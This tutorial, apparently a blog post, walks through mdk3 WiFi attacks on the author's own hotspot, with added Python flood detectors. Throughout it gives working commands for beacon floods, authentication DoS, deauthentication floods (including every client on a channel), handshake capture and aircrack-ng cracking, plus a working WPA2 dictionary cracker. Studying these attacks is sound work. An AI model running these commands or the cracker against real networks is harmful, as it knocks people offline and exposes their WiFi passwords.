Penetration test -- 6.2 mdk3 attacks on WiFi

Foreword

As before, the setup is a Kali Linux virtual machine on a Windows 11 host, with a Ralink 802.11 USB network card.

mdk3 is used here for WiFi forgery (beacon flooding), viewing connected devices, and deauthentication attacks.
This experiment is for learning and discussion only. The attack target is my own mobile phone hotspot. Do not use this against networks you are not authorized to test!

Table of contents

Foreword

1. Deauth attack principle

2. Introduction to mdk3

3. mdk3 in practice

Preparation

3.1 mdk3 creates a virtual WiFi

3.1.1 Create a single virtual WiFi

3.1.2 Create a large number of virtual WiFi networks

3.2 Scan for devices connected to a WiFi network

3.3 DoS attack on a designated AP

3.4 Launch a deauthentication attack against the specified AP

3.4.1 Attacking a single AP

3.4.2 Attacking every AP on a channel

4. Using mdk3 in a full wireless attack

Step 1: Use mdk3 to force connected devices offline

Step 2: Capture the handshake

Step 3: Crack the WiFi password with a dictionary


1. Deauth attack principle

        A deauthentication flood attack (De-authentication Flood Attack, usually shortened to Deauth attack) is a form of denial of service against a wireless network. The attacker spoofs deauthentication frames that appear to come from the AP, addressed to a client's unicast address, to push that client into the unassociated/unauthenticated state. Because 802.11 management frames carry no proof of who sent them (unless 802.11w management frame protection is enabled on both AP and client), any monitor-mode card that can inject frames can do this, which makes the attack fast and very effective at disrupting client service. Typically the client re-associates and re-authenticates to regain service, and the attacker then sends the next deauthentication frame; repeating this continuously denies service to all clients of the AP.
        It should be noted that the De-authentication Broadcast Attack and the De-authentication Flood Attack work on the same principle and differ only in how the frames are sent (to the broadcast address versus to each client's unicast address) and in the tools used. The broadcast variant is usually a supporting step in wireless man-in-the-middle attacks, while the flood variant is used for pure wireless DoS, which is why less careful wireless security material tends to lump the two together.

The specific steps of a deauthentication flood attack are as follows:

  1. The attacker first identifies the targets (the wireless access point and all clients connected to it) with a scanning tool.
  2. The attacker injects deauthentication frames into normal wireless traffic, spoofing the addresses of the access point and of the clients. The clients believe these frames come from the access point.
  3. After "kicking" the chosen client off the network, the attacker can do the same to the other clients, and can keep them from reconnecting to the AP.
  4. The clients keep trying to reconnect, but are disconnected again as long as the attacker keeps sending frames.
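To make the principle concrete, here is an added example (not from the original post, and not mdk3's code) in Python. It lays out deauthentication frames the way a spoofing tool does (frame control 0xC0, three MAC addresses, a 2-byte reason code) and runs a simple flood detector over a constructed capture. The frames are only built in memory as detector input; nothing is transmitted. The one-second bucket, the threshold of ten frames, the timestamps and the MAC addresses are assumptions for the demonstration. What the builder makes visible is what is missing from the frame: no field ties it to the real AP, which is why 802.11w/PMF adds a MIC to management frames and why a detector has to rely on rate and reason-code patterns instead.

```python
"""Spoofed deauthentication frames: how they are laid out and how a monitor can
spot a flood. Added example, not part of the original post or of mdk3."""
import struct
from collections import Counter, defaultdict

# 802.11 frame control byte 0 for a management frame (type 0) with subtype 12
# (deauthentication): subtype << 4 | type << 2 | version = 0xC0. Byte 1 (flags) is 0.
FC_DEAUTH = 0xC0
# Reason codes from the 802.11 standard; floods commonly use one of these two.
REASON_UNSPECIFIED = 1
REASON_CLASS3_FROM_NONASSOC_STA = 7


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_deauth(bssid: str, client: str, reason: int, seq: int) -> bytes:
    """Forge a deauth frame 'from the AP' to one client: addr1 = client (DA),
    addr2 = BSSID (SA), addr3 = BSSID. Nothing here authenticates the sender;
    that absence is the whole attack (802.11w/PMF adds a MIC that would fail)."""
    header = struct.pack("<BBH6s6s6sH",
                         FC_DEAUTH, 0x00,                 # frame control
                         0x013A,                          # duration/ID
                         mac_bytes(client), mac_bytes(bssid), mac_bytes(bssid),
                         (seq << 4) & 0xFFFF)             # sequence number in the upper 12 bits
    return header + struct.pack("<H", reason)             # 2-byte reason code body


def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, body) or None for non-management frames."""
    if len(frame) < 24:
        return None
    fc0, _fc1, _dur, a1, a2, a3, _seq = struct.unpack_from("<BBH6s6s6sH", frame, 0)
    if fc0 & 0x0C != 0:                                   # type bits b2,b3 must be 00 = management
        return None
    return fc0 >> 4, mac_str(a1), mac_str(a2), mac_str(a3), frame[24:]


def detect_deauth_flood(frames, threshold_per_sec=10):
    """frames: iterable of (timestamp_seconds, raw_frame).
    Groups deauth frames by (BSSID, one-second bucket) and returns the buckets whose
    count exceeds the threshold, with the victims and a reason-code histogram for triage.
    The threshold is an assumption for a quiet lab network: a real AP evicts a client
    once, a spoofing tool sends dozens per second."""
    buckets = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] != 0x0C:
            continue
        _, dst, _src, bssid, body = parsed
        reason = struct.unpack_from("<H", body, 0)[0] if len(body) >= 2 else None
        buckets[(bssid, int(ts))].append((dst, reason))
    alerts = {}
    for (bssid, second), hits in buckets.items():
        if len(hits) > threshold_per_sec:
            alerts[(bssid, second)] = {
                "frames": len(hits),
                "victims": sorted({d for d, _ in hits}),
                "reasons": dict(Counter(r for _, r in hits)),
            }
    return alerts


def demo():
    """Constructed traffic (assumed addresses): one legitimate deauth at t=0, then a
    50-frame flood against two clients of the same AP during the t=5 second."""
    ap, c1, c2 = "76:87:4e:74:34:06", "a4:50:46:11:22:33", "3c:22:fb:aa:bb:cc"
    frames = [(0.2, build_deauth(ap, c1, REASON_UNSPECIFIED, 1))]   # the AP really kicking c1
    for i in range(50):
        victim = c1 if i % 2 == 0 else c2
        frames.append((5.0 + i / 200.0, build_deauth(ap, victim, REASON_CLASS3_FROM_NONASSOC_STA, i)))
    return detect_deauth_flood(frames)


if __name__ == "__main__":
    for (bssid, sec), info in demo().items():
        print(f"t={sec}s BSSID {bssid}: {info['frames']} deauths -> {info['victims']} reasons={info['reasons']}")
```

The detector keys on the BSSID in addr3 rather than the transmitter address, because the attacker copies the AP's address into both; in a real capture the sequence-number field is another useful signal, since the spoofed stream's counter will not line up with the AP's own.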

The figure below (the author's own diagram of a deauthentication flood attack) shows the attacker sending forged deauthentication frames across the whole wireless network.


2. Introduction to mdk3

MDK3 (Murder Death Kill 3) is an open source wireless attack tool used for WiFi function testing, exploiting protocol weaknesses, brute forcing (hidden SSIDs and MAC filters) and DoS attacks. It can simulate a range of attack scenarios and offers many useful modes and options. The common ones are listed below (the help text is mdk3's own; the comments after # are explanatory):

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]   # usage: mdk3 <monitor-mode interface> <test mode> [options]

TEST MODES:  # test modes

b   - Beacon Flood Mode  # beacon flood: advertise fake APs to pollute clients' scan lists

      OPTIONS:
      -n <ssid>
         Use SSID <ssid> instead of randomly generated ones  # fixed SSID instead of random names
      -f <filename>
         Read SSIDs from file  # one SSID per line
      -v <filename>
         Read MACs and SSIDs from file.  # MAC and SSID pairs from a file
      -d
         Show station as Ad-Hoc  # advertise the fake network as Ad-Hoc (IBSS)
      -w
         Set WEP bit (Generates encrypted networks)  # advertise the fake network as WEP-protected
      -g
         Show station as 54 Mbit  # advertise 802.11g (54 Mbit) rates
      -t
         Show station using WPA TKIP encryption  # advertise WPA/TKIP
      -a
         Show station using WPA AES encryption  # advertise WPA/AES (CCMP)
      -m
         Use valid accesspoint MAC from OUI database  # fake BSSIDs built from real vendor OUIs
      -h
         Hop to channel where AP is spoofed  # hop to the channel the fake AP claims to be on
         This makes the test more effective against some devices/drivers  # more convincing to some clients/drivers
         But it reduces packet rate due to channel hopping.  # at the cost of packet rate
      -c <chan>
         Fake an AP on channel <chan>. If you want your card to hop on  # advertise the fake AP on channel <chan>
         this channel, you have to set -h option, too!  # combine with -h if the card should actually transmit there
      -s <pps>
         Set speed in packets per second (Default: 50)  # rate in packets per second (default 50)

a   - Authentication DoS mode  # authentication request flood

      OPTIONS:
      -a <ap_mac>
         Only test the specified AP  # target one BSSID
      -m
         Use valid client MAC from OUI database  # fake client MACs built from real vendor OUIs
      -c
         Do NOT check for test being successful  # skip the success check
      -i <ap_mac>
         Perform intelligent test on AP (-a and -c will be ignored)  # "intelligent" mode against one AP
         This test connects clients to the AP and reinjects sniffed data to keep them alive  # fake clients are kept associated by replaying sniffed data
      -s <pps>
         Set speed in packets per second (Default: unlimited)  # rate in packets per second (default unlimited)

p   - Basic probing and ESSID Bruteforce mode  # probing and hidden-SSID brute force

      Use -f and -t option to enable SSID Bruteforcing.  # -f together with -t turns on SSID brute forcing
      OPTIONS:
      -e <ssid>
         Tell mdk3 which SSID to probe for  # probe for this SSID
      -f <filename>
         Read lines from file for bruteforcing hidden SSIDs  # wordlist of candidate hidden SSIDs
      -t <bssid>
         Set MAC address of target AP  # target BSSID
      -s <pps>
         Set speed (Default: unlimited, in Bruteforce mode: 300)  # rate (default unlimited; 300 in brute force mode)
      -b <character set>
         Use full Bruteforce mode (recommended for short SSIDs only!)  # exhaustive brute force over a character set (short SSIDs only)
         Use this switch only to show its help screen.  # run with -b alone to print its help

d   - Deauthentication / Disassociation Amok Mode  # deauthentication / disassociation flood
      Kicks everybody found from AP  # kicks every client it sees off its AP
      OPTIONS:
      -w <filename>
         Read file containing MACs not to care about (Whitelist mode)  # whitelist: MACs listed in the file are left alone
      -b <filename>
         Read file containing MACs to run test on (Blacklist Mode)  # blacklist: only MACs listed in the file are attacked
      -s <pps>
         Set speed in packets per second (Default: unlimited)  # rate in packets per second (default unlimited)
      -c [chan,chan,chan,...]
         Enable channel hopping. Without providing any channels, mdk3 will hop on all  # channel hopping; with no list given, all
         14 b/g channels. Channel will be changed every 5 seconds.  # 14 b/g channels are cycled, changing every 5 seconds

m   - Michael shutdown exploitation (TKIP)  # Michael (TKIP MIC) countermeasure exploitation
      Cancels all traffic continuously  # keeps the AP's TKIP countermeasures tripped so all traffic stops
      -t <bssid>
         Set Mac address of target AP  # target BSSID
      -w <seconds>
         Seconds between bursts (Default: 10)  # seconds between bursts (default 10)
      -n <ppb>
         Set packets per burst (Default: 70)  # packets per burst (default 70)
      -j
         Use the new TKIP QoS-Exploit  # use the newer TKIP QoS exploit
         Needs just a few packets to shut AP down!  # needs only a few packets to shut the AP down
      -s <pps>
         Set speed (Default: 400)  # rate (default 400)

w   - WIDS/WIPS/WDS Confusion
      Confuses a WDS with multi-authenticated clients which messes up routing tables
      -e <SSID>
         SSID of target WDS network  # SSID of the target WDS network
      -c [chan,chan,chan...]
         Use channel hopping  # channel hopping
      -z
         Activate Zero_Chaos' WIDS exploit
         (authenticates clients from a WDS to foreign APs to make WIDS go nuts)

f   - MAC filter bruteforce mode  # MAC filter brute force
      This test uses a list of known client MAC addresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs which properly deny an open authentication request.
      -t <bssid>
         Target BSSID  # target BSSID
      -m <mac>
         Set the MAC address range to use (3 bytes, i.e. 00:12:34)  # 3-byte OUI prefix to iterate over
         Without -m, the internal database will be used  # without -m the built-in OUI database is used
      -f <mac>
         Set the MAC address to begin bruteforcing with  # start address for the brute force
         (Note: You can't use -f and -m at the same time)  # -f and -m are mutually exclusive

g   - WPA Downgrade test  # WPA downgrade test
      Deauthenticates stations and APs sending WPA-encrypted packets.
      With this test you can check whether the sysadmin will try setting the
      network to WEP or disabling encryption. mdk3 lets WEP and unencrypted
      clients work, so if the sysadmin simply concludes "WPA is broken", he
      is certainly not the right person for the job.
      (This can/should be combined with social engineering.)
      -t <bssid>
         Target network  # target BSSID

MDK3 supports other options and features as well, which can be used as needed. When using MDK3, make sure you have proper authorization for the target network and understand the legal restrictions on using the tool.


3. mdk3 in practice

Preparation

Plug in the wireless card and confirm the Kali VM sees it:

Switch the card into monitor mode (the interface is called wlan0mon from here on):

Scan for nearby APs to find the target's BSSID and channel:


3.1 mdk3 creates a virtual WiFi

3.1.1 Create a single virtual WiFi

Enter the following command to advertise a fake WiFi network called "test_wifi":

mdk3 wlan0mon b -n test_wifi

b selects Beacon Flood Mode; -n sets the SSID to advertise instead of random names.

 

3.1.2 Create a large number of virtual WiFi networks

Enter the following command to advertise a large number of WiFi networks with random names on channel 1:

mdk3 wlan0mon b -g -c 1

This command runs Beacon Flood Mode (b) on the monitor interface wlan0mon:

-c 1 puts the fake APs on channel 1;

-g advertises them as 54 Mbit (802.11g) networks, so they look like ordinary APs in a client's scan list.

mdk3 keeps sending beacon frames with random SSIDs and random BSSIDs. The effect is on clients and scanners, not on the real AP: their network lists fill with phantom networks and the legitimate SSID becomes hard to find. Devices that are already connected are not knocked off by beacons alone; for that, see the deauthentication modes below.

After a while, dozens of WiFi networks have appeared.
PS: the names of the fake APs can be read from a local file:

mdk3 wlan0mon b -f /root/names.txt -c 6 -s 1000

This command runs Beacon Flood Mode on wlan0mon with random BSSIDs on channel 6, takes the SSIDs from /root/names.txt instead of generating random ones, and sends 1000 beacon frames per second (-s is packets per second, not milliseconds; the default is 50). In this way a large number of hotspot advertisements are broadcast to nearby devices to confuse and mislead users of the target network.
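As an added example (not from the original post or from mdk3), the following Python builds beacon frames shaped like the ones described above and shows how a monitor can tell a beacon flood from normal traffic: a beacon parser that walks the tagged parameters for the SSID and DS Parameter Set (channel) IEs, and a detector that counts distinct BSSIDs per channel per time window. The OUI allowlist, the 5-second window, the 20-BSSID threshold, the timestamps and all MAC addresses are constructed assumptions. The OUI ratio is reported only as a hint: -m lets mdk3 draw genuine vendor OUIs, so the robust signal is the rate at which new BSSIDs appear, not how their addresses look.

```python
"""Beacon-flood detection for the fake-AP traffic described above.
Added example, not code from the original post or from mdk3."""
import struct
from collections import defaultdict

FC_BEACON = 0x80            # management frame (type 0), subtype 8 = beacon
IE_SSID, IE_DS_PARAMS = 0, 3


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_beacon(bssid: str, ssid: str, channel: int, seq: int) -> bytes:
    """Minimal beacon: 24-byte header, 12-byte fixed fields, then SSID and DS Parameter Set IEs."""
    header = struct.pack("<BBH6s6s6sH", FC_BEACON, 0, 0,
                         mac_bytes("ff:ff:ff:ff:ff:ff"), mac_bytes(bssid), mac_bytes(bssid),
                         (seq << 4) & 0xFFFF)
    fixed = struct.pack("<QHH", 0, 100, 0x0411)   # timestamp, beacon interval (100 TU), capability info
    ssid_b = ssid.encode()
    ies = bytes([IE_SSID, len(ssid_b)]) + ssid_b + bytes([IE_DS_PARAMS, 1, channel])
    return header + fixed + ies


def parse_beacon(frame: bytes):
    """Return (bssid, ssid, channel) or None if the frame is not a beacon."""
    if len(frame) < 36:
        return None
    fc0, _fc1, _dur, _a1, _a2, a3, _seq = struct.unpack_from("<BBH6s6s6sH", frame, 0)
    if fc0 != FC_BEACON:
        return None
    ssid, channel, pos = None, None, 36
    while pos + 2 <= len(frame):                   # walk the tagged parameters (id, len, value)
        ie_id, ie_len = frame[pos], frame[pos + 1]
        val = frame[pos + 2: pos + 2 + ie_len]
        if len(val) < ie_len:
            break                                  # truncated IE: stop rather than guess
        if ie_id == IE_SSID:
            ssid = val.decode("utf-8", "replace")
        elif ie_id == IE_DS_PARAMS and ie_len == 1:
            channel = val[0]
        pos += 2 + ie_len
    return mac_str(a3), ssid, channel


# Constructed allowlist standing in for a real OUI database (an assumption, not a vendor list).
KNOWN_OUIS = {"f4:f2:6d", "a4:50:46", "3c:22:fb"}


def detect_beacon_flood(frames, window_s=5, max_bssids=20):
    """frames: iterable of (timestamp_seconds, raw_frame). Per (channel, window) collect the
    distinct BSSIDs seen beaconing and flag windows with more than max_bssids of them.
    The share of unknown OUIs is a hint only (mdk3 -m can use valid vendor OUIs)."""
    seen = defaultdict(dict)                       # (channel, window) -> {bssid: ssid}
    for ts, raw in frames:
        parsed = parse_beacon(raw)
        if parsed is None:
            continue
        bssid, ssid, channel = parsed
        seen[(channel, int(ts // window_s))][bssid] = ssid
    alerts = {}
    for key, aps in seen.items():
        if len(aps) > max_bssids:
            unknown = sum(1 for b in aps if b[:8] not in KNOWN_OUIS)
            alerts[key] = {"bssids": len(aps),
                           "distinct_ssids": len(set(aps.values())),
                           "unknown_oui_ratio": round(unknown / len(aps), 2)}
    return alerts


def demo():
    """Constructed capture: three real APs on channel 1 beaconing normally for 10 s, then
    60 fake BSSIDs with random-looking names landing in seconds 5..9, the way the
    'mdk3 wlan0mon b -c 1' traffic above would look to a sniffer."""
    frames = []
    real = [("f4:f2:6d:00:00:01", "office"), ("a4:50:46:00:00:02", "guest"), ("3c:22:fb:00:00:03", "lab")]
    for t in range(10):
        for bssid, ssid in real:
            frames.append((float(t), build_beacon(bssid, ssid, 1, t)))
    for i in range(60):
        fake_bssid = f"02:{i:02x}:{(i * 7) % 256:02x}:4d:4b:33"
        frames.append((5.0 + i / 12.0, build_beacon(fake_bssid, f"net{i:03d}", 1, i)))
    return detect_beacon_flood(frames)


if __name__ == "__main__":
    for (channel, window), info in demo().items():
        print(f"channel {channel}, window {window}: {info}")
```

The first 5-second window holds only the three real APs and stays quiet; the second holds 63 distinct BSSIDs and is flagged. The threshold is the tuning knob: set it just above the largest number of APs legitimately sharing a channel at your site.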


3.2 Scan for devices connected to a WiFi network

The following command is commonly used to see which clients are attached to a given network (replace <SSID> with the target WiFi name):

mdk3 wlan0mon w -e <SSID>

Caveat: per the help text in section 2, w is the WIDS/WIPS/WDS confusion mode, not a passive scanner. It prints the APs and clients it discovers for that SSID, which is why it gets used this way, but it also actively (re)authenticates those clients against other APs. For a quiet inventory of connected stations, the airodump-ng capture in section 4, locked to the target BSSID, lists them without injecting anything.


3.3 DoS attack on a designated AP

This is the authentication request flood mode: mdk3 sends a large number of authentication requests from randomly generated client MACs to the target AP, so the AP is kept busy handling them and stops responding to legitimate clients. Its best-known use is alongside WPS PIN brute forcing with reaver: when an AP has locked WPS after too many PIN attempts ("pinned dead"), this mode can stop the AP responding altogether and push the owner into rebooting the router, which normally clears the lock. Routers with anti-DoS protection are much less affected.

Enter the following command to launch the DoS attack against the specified AP (replace [MAC] with the target BSSID):

mdk3 wlan0mon a -a [MAC]

This attack seems to have no effect on my router. It may be that my router has anti-DoS protection, or that the attack ran too briefly and the requests were processed normally.


3.4 Launch a deauthentication attack against the specified AP

3.4.1 Attacking a single AP

Use the following command to force the devices connected to the target AP offline (replace the MAC address with the target's):

mdk3 wlan0mon d 76:87:4E:74:34:06

This runs mdk3's Deauthentication / Disassociation Amok Mode (d). During the attack mdk3 sends a stream of deauth frames; clients that receive them drop off the WiFi network, re-associate, and are kicked again.

Caveat: the d-mode options listed in section 2 are -w, -b, -s and -c; a bare MAC address is not one of them. The documented way to confine the attack to one AP (or to chosen clients) is a blacklist file, one MAC per line, passed with -b, optionally pinned to the AP's channel with -c. Without that, mdk3 kicks every client it sees, so check its output before assuming only the intended AP is affected.

3.4.2 Attacking every AP on a channel

In this mode the software cycles through all visible APs and their clients, so it can paralyse every wireless network in range (subject to the whitelist and blacklist options) until the attack is stopped manually.

mdk3 wlan0mon d -c 11

This runs Deauthentication Mode against everything on WiFi channel 11 (-c with a single channel means the card stays on that channel rather than hopping). During the attack mdk3 sends a large number of deauth frames to force every client on that channel off its network.

Stop it quickly with Ctrl-C, or someone will come looking for whoever is knocking the whole neighbourhood offline!


4. Using mdk3 in a full wireless attack

Step 1: Use mdk3 to force connected devices offline

Use mdk3 against the specified AP to send deauthentication frames and knock the connected devices off the AP:

mdk3 wlan0mon d 76:87:4E:74:34:06

At this point the phone can no longer stay connected to the WiFi.

Step 2: Capture the handshake

When the kicked client reconnects it performs the WPA 4-way handshake again; capture it with airodump-ng locked to the target's channel and BSSID, writing to a capture file:

airodump-ng -c 1 --bssid 76:87:4E:74:34:06 -w /home/gyp-202031070222/桌面/wifi2 wlan0mon

Step 3: Crack the WiFi password with a dictionary

aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/gyp-202031070222/桌面/wifi2-01.cap

The principle is the same as the earlier deauth attack: disconnect the client, capture the handshake it sends when it reconnects, then run a dictionary attack against that handshake!
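What aircrack-ng is doing in step 3, as an added Python example (not the original post's code and not aircrack-ng's): for each dictionary word derive PMK = PBKDF2-HMAC-SHA1(word, SSID, 4096 rounds, 32 bytes), expand it with the 802.11i PRF-512 into the PTK using the two MAC addresses and the two nonces taken from the captured handshake, use the first 16 bytes as the KCK, recompute the MIC over the EAPOL-Key frame (the WPA2/AES key descriptor uses HMAC-SHA1 truncated to 16 bytes; WPA1/TKIP uses HMAC-MD5) and compare it with the captured one. The handshake message, nonces, client MAC and the five-word wordlist are constructed inline so it runs offline; the SSID test_wifi and the BSSID come from the post, everything else is assumed.

```python
"""Dictionary attack on a captured WPA2 4-way handshake: the computation behind
'aircrack-ng -w wordlist capture.cap'. Added example, not the post's or aircrack-ng's code."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK per 802.11i: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (AES-CCMP) key descriptor: MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16].
    The MIC sits at offset 81: 4-byte 802.1X header plus 77 bytes of key descriptor before it."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Try each candidate; the first whose recomputed MIC matches the captured one is the PSK.
    Message 2 (or 3) of the handshake suffices: it carries a MIC and both nonces are known by then."""
    captured_mic = eapol_msg2[81:97]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return word
    return None


def make_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed message-2-shaped EAPOL-Key frame (test input, not a real capture): 802.1X header,
    descriptor type 2 (RSN), key info 0x010a (HMAC-SHA1/AES, pairwise, MIC bit), key length,
    replay counter, SNonce, IV, RSC, ID, then the 16-byte MIC and a zero key-data length."""
    body = (bytes([0x02]) + (0x010A).to_bytes(2, "big") + (0).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8)
    frame = (bytes([0x01, 0x03]) + (len(body) + 16 + 2).to_bytes(2, "big")
             + body + b"\x00" * 16 + b"\x00\x00")
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]


def demo():
    """Constructed scenario: the SSID and BSSID from the post, an assumed client MAC and nonces,
    a real PSK of 'sunshine1', and a five-word stand-in for rockyou.txt."""
    ssid = "test_wifi"
    ap_mac = bytes.fromhex("76874e743406")
    sta_mac = bytes.fromhex("a45046112233")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_ptk(pmk_from_passphrase("sunshine1", ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = make_msg2(kck, snonce)
    wordlist = ["123456", "password", "iloveyou", "sunshine1", "qwerty"]
    return crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

The cost that makes WPA2-PSK dictionary attacks slow is the 4096-round PBKDF2 per candidate, and the SSID salt is why precomputed tables only work for common network names; a long random passphrase on an unusual SSID is what defeats step 3, since steps 1 and 2 cannot be prevented without 802.11w.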

 

Origin blog.csdn.net/qq_58602552/article/details/130750824